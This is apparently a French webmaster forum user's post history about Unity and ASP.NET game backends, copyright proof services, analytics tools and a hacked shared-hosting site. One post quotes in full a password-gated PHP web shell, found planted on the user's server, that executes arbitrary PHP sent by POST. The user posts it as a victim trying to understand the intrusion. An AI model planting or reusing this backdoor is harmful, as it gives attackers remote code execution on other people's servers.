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Pat AfterMoon

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  1. Bonjour LiliToxic et bienvenue sur le HUB ! Un petit lien vers le genre de chose que tu fais avec Unity 3D ?
  2. Il existe pas mal de scripts de chat en AJAX, il me semble que les meilleurs donnent l'impression d'être aussi réactif qu'un traditionnel IRC. Je crois que le chat suivant (http://chat.developpez.com/) est basé sur le projet open-source AnoChat (php/javascript) et le résultat est excellent.
  3. Merci pour tes réponses SStephane, je suis en train de découvrir l'écosystème Microsoft/IIs et en temps que vieu développeur C++ nouvellement C# cela me plait de plus en plus. J'ai jeté un coup d’œil à DotNetNuke et cela m'a emballé. En plus pour ce genre de composant je ne me vois pas utiliser autre chose que de l'open-source. Cela fait plaisir de voir que même ce qui tourne autour de Microsoft à finis par prendre le virage. Oui, c'est ça. Pour l'instant je n'ai fait que des tests basiques d'appel depuis Unity vers un site web ASP.net. J'ai testé en SOAP et en JSON. Du coté du serveur c'est quasi transparent, le Framework DotNet prend tout en charge. Du coté de Unity ce n'est pas pareil. Si tu veux faire un jeu dans le navigateur il y a des restrictions de sécurité qui empêchent d'utiliser des librairies pré-compilées, du coup on a pas accès à toute la couche communication du Framework DotNet. Pour un projet Unity Standalone, il n'y a pas de problème, on inclut l'assembly qui va bien et cela devient aussi simple du coté client que serveur. Je n'en suis pas encore au stade de faire des vrais tests de charge, mais ce qui est sûr c'est qu'au niveau d'un jeu vidéo on ne gère pas une liaison de type "webservice" comme une liaison UDP entre un client et un serveur qui interagissent avec un ping de moins de 100 ms. Mes webservices vont gérer l'authentification (login/pass) et la persistance (inventaire, score, ...etc.). Par exemple, sur mon projet précédent il n'est pas rare que des joueurs aux 4 coins du monde prennent plus de 5 secondes pour un faire un appel RPC, mais le jeu le gère parfaitement. Les seuls appels bloquant ont lieu lorsqu'on change de niveau ou lorsque le joueur "meurt", dans les 2 cas ce n'est pas trop gênant.
  4. Et bien voila encore un exemple de réponse trouvée surtout par le fait de formaliser la question (et après une nuit de sommeil ) En fait cela fait des lustre que j'ai ce schéma en tête mais en relisant la question ce matin, je me suis dit : mais c'est beaucoup trop compliqué pour un projet que je veux mener à moi tout seul. Dans mon projet précédent c'était la même base de données "user account" qui servait pour le jeu, le forum, le chat, le profil ...etc. En loccurrence j'avais tout greffé sur la base de donnée de phpBB. Mais cela crée une dépendance qui est lourde à gérer et cela fait de multiple source dinteraction avec les données du joueur. Finalement aujourd'hui, avec les idées plus claires, je m'oriente plutôt vers ça : Merci au Hub pour m'avoir permis d'éclaircir mes idées EDIT pour SStephane (on a posté en même temps) : merci de ta réponse qui confirme un peut plus ce dont je me doutais.
  5. Bonjour, Je suis en train de développer un projet dont voici à peut près la structure : Il s'agit d'un jeu vidéo dans le navigateur qui interagit avec un site web. J'ai déjà développé un projet similaire mais avec des technologies différentes (client Windows en C, web-service REST en PHP, forum phpBB, web-chat et player-profile en PHP). Cette fois-ci je voudrais vraiment simplifier les choses et harmoniser au maximum les outils et les langages utilisés. Le client est fait avec Unity et le jeu est codé en C#. Je souhaiterais utiliser le même langage coté serveur. Jusqu'à maintenant je n'avais que des sites web sur des serveurs Apache/MySQL/Php. Je viens de prendre un hébergement IIs/ASP.net/SQL-server et j'ai fait quelques tests avec des web-services ASP.net en C#. Tout fonctionne comme je le souhaitais, et le fait d'utiliser la même technologie coté client et serveur simplifie vraiment les choses. Maintenant je me demande ce que ça peut donner pour le forum, le webchat et les pages web spécifiques. Le serveur IIs de Microsoft propose aussi le Php. Au début je pensais mettre à nouveau un forum phpBB et faire les autres développements web en PHP. Maintenant je me demande si je ne vais pas tout faire avec de la techno Microsoft. A priori il existe des forums, des webchats et des CMS open-source en ASP.net et C#. Est ce que des webmasters de ce forum savent ce que ça vaut ? des conseils à me donner ?
  6. Mince, je suis super vexé, pour mes 2 sites web il indique "Désolé, nous n'avons pas de données sur ce site" Bon d'un autre coté, des sites à 50 visites par jour...
  7. Donc si j'ai bien compris Nullette, tu as opté pour un huissier prés de chez toi. Est ce qu'il est possible de savoir combien un tel constat t'a couté ? éventuellement par mp si tu préfères. Merci d'avance.
  8. Merci pour la réponse Kriss. En tout cas s'il y a d'autre exemples aussi détaillés que le lien d'Arlette sur des affaires similaires, je suis preneur
  9. Merci Arlette et Kriss pour vos messages, voila qui confirme comme souvent l'incroyable qualité de ce forum. Ce sujet m'intéresse vraiment et sans la réponse de kriss j'envisageais de contacter CopyrightFrance pour connaitre leur avis sur l'affaire citée. D'ailleurs, existe t-il un message officiel de CopyrightFrance à propos de cette affaire et de ce qui semble être une erreur de procédure ? Ou alors existe t-il des liens vers des affaires semblables ayant mis en uvre des services comme CopyrightFrance ?
  10. Pour les constats, peut être que quelqu'un de ce forum a déjà testé www.constatonline.com Ce service semble être lié à www.copyrightfrance.com que j'utilise et qui est très sérieux sur le plan technique. Par contre je n'ai encore jamais testé en justice.
  11. Merci pour vos réponses, mais vous m'avez rendu complètement parano Ce qui m'embête c'est que je ne saurai jamais quelle est vraiment la faille sur ce coup. Ce qui m'inquiète le plus c'est mes scripts maison, car je ne maintiens plus trop ce site et que les risques de failles sont nombreux. En tout cas à l'avenir si j'ai un nouveau site à faire je vais peux être revoir ma stratégie vis à vis de la formule Pro multi-domaine d'OVH. Parce sur ce coup la, avec un site hacké, c'est tous mes site qui sont exposés. Par contre j'ai remplacé le script du hackeur par un script à moi qui stocke des infos en cas d'accès, et pour l'instant je n'ai eu aucun hit. Peut être que le script n'est utilisé qu'une seule fois juste après avoir été introduit. C'est dommage, j'aurais bien aimé voir l'adresse IP et le mot de passe Mais s'ils avaient poussé le vice jusqu'à effacer le script, je ne me serais même pas rendu compte de quoi que ce soit.
  12. J'utilise Filezilla comme client FTP, mais quel est le rapport ? Quelle est cette histoire de "compte Filezilla piratés" ? Je n'ai pas de "compte" FileZilla, par contre j'ai un compte FTP pour accéder à mon site web, et jusqu'à maintenant j'avais gardé le mot de passe attribué par défaut par OVH.
  13. Bonjour, Ce soir me connectant à mon site web par FTP j'ai découvert un truc que je n'avais jamais vu. Un répertoire a été créé avec un fichier PHP dedans, cela ressemble a un hack capable d'exécuter un code PHP transmis à distance. Le répertoire s'appelait "hammerda" et le fichier 5bfa44.php. Le contenu du fichier était le suivant : <? if ( md5($_POST["PARAM_HASH"]) == "d673f1f28d9cddf84ad8aeb58d430b8e" ){ ?> <? if(get_magic_quotes_gpc() == 1){ ?> <? $post = stripslashes($_POST["f"]) ?> <? }else{ ?><? $post = $_POST["f"] ?> <? } ?> <? $test_func = create_function("", $post) ?> <? $test_func() ?> <? } ?> <? die ?> D'après ce que j'en comprends cela permet d'envoyer du code source PHP à distance et de l'exécuter directement. Il y a même un système de protection pour éviter que n'importe qui utilise le script (en tout cas c'est comme ça que je comprends le PARAM_HASH). J'imagine que cela permet d'envoyer du spam depuis mon serveur ou d'attaquer mon site depuis l'intérieur. Bien sur j'ai effacé tout ça, mais je me demande comment le hackeur a réussi a le mettre chez moi. Pour info, j'ai un hébergement mutualisé, PHP, MySQL, plusieurs scripts maison et un forum phpBB.
  14. Bonjour, Pour un site vitrine de PME française je voudrais savoir quel est l'outil de statistique globalement bon, mais qui propose la meilleur géolocalisation des visiteurs français. Si l'outil a une interface en français, c'est un plus. PS: Sur mes sites persos j'utilise Google Ana en anglais, et je ne vois pas s'il est possible de le mettre en français. merci d'avance.
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